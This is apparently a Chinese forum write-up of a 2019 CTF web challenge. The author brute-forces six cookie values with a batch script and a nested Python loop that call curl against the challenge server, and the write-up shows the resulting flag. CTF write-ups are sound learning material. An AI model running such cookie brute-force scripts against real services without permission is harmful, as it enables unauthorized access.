-
-
[原创] CTF2019-3-07 web svr wp
-
2019-9-18 17:07
2097
-
[原创] CTF2019-3-07 web svr wp
第一次做这类的。
打开网页 http://154.8.174.214:8080/ 返回
Not Admin
。莫名其妙。
用curl 可以收发内容观察。
C:\Users\Administrator>C:\Windows\System32\curl.exe -i http://154.8.174.214:8080
HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 09:03:10 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: key0=0
Set-Cookie: key1=0
Set-Cookie: key2=0
Set-Cookie: key3=0
Set-Cookie: key4=0
Set-Cookie: key5=0
Content-Length: 9
Content-Type: text/html; charset=UTF-8
Not Admin
反馈为Not Admin。中间为一些Cookie。可以尝试设置这些Cookie。
编写脚本,输入 6 个 cookie。传入。当返回改变时,输出到日志中。
@setlocal EnableDelayedExpansion
set cmdd=C:\Windows\System32\curl.exe -b "key0=%1; key1=%2; key2=%3; key3=%4; key4=%5; key5=%6" http://154.8.174.214:8080
echo %cmdd%
for /F "DELIMS=-" %%I in ( '!cmdd!' ) do (
if "%%I" equ "Not Admin" ( echo ok key0=%1; key1=%2; key2=%3; key3=%4; key4=%5; key5=%6 ) else (
echo key0=%1; key1=%2; key2=%3; key3=%4; key4=%5; key5=%6 diff!! >> 111.log
)
)
编写Python脚本来遍历。吐槽下Python不太了解,还需要学习。
from subprocess import run
for i in range(0, 10):
for j in range(0, 10):
for k in range(0, 10):
for l in range(0, 10):
for m in range(0, 10):
print ("{} {} {} {} {}".format(i, j, k, l, m))
for n in range(0, 10):
commd = '1.bat {} {} {} {} {} {}'.format(i,j,k,l,m,n)
#os.system(commd)
run(commd,shell=True)
效率很慢,跑了很久,终于跑出来了。
key0=1; key1=0; key2=0; key3=1; key4=1; key5=0 diff 。
输入 C:\Windows\System32\curl.exe -i -b "key0=1; key1=0; key2=0; key3=1; key4=1; key5=0" http://154.8.174.214:8080。
C:\Users\Administrator>C:\Windows\System32\curl.exe -i -b "key0=1; key1=0; key2=0; key3=1; key4=1; key5=0" http://154.8.174.214:8080
HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 09:07:07 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: key0=0
Set-Cookie: key1=0
Set-Cookie: key2=0
Set-Cookie: key3=0
Set-Cookie: key4=0
Set-Cookie: key5=0
Content-Length: 42
Content-Type: text/html; charset=UTF-8
flag{4E0844E2-705A-4374-9050-F56A10BA9E9B}
得到正确结果。
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
最后于 2019-9-18 17:20
被scpczc编辑
,原因:
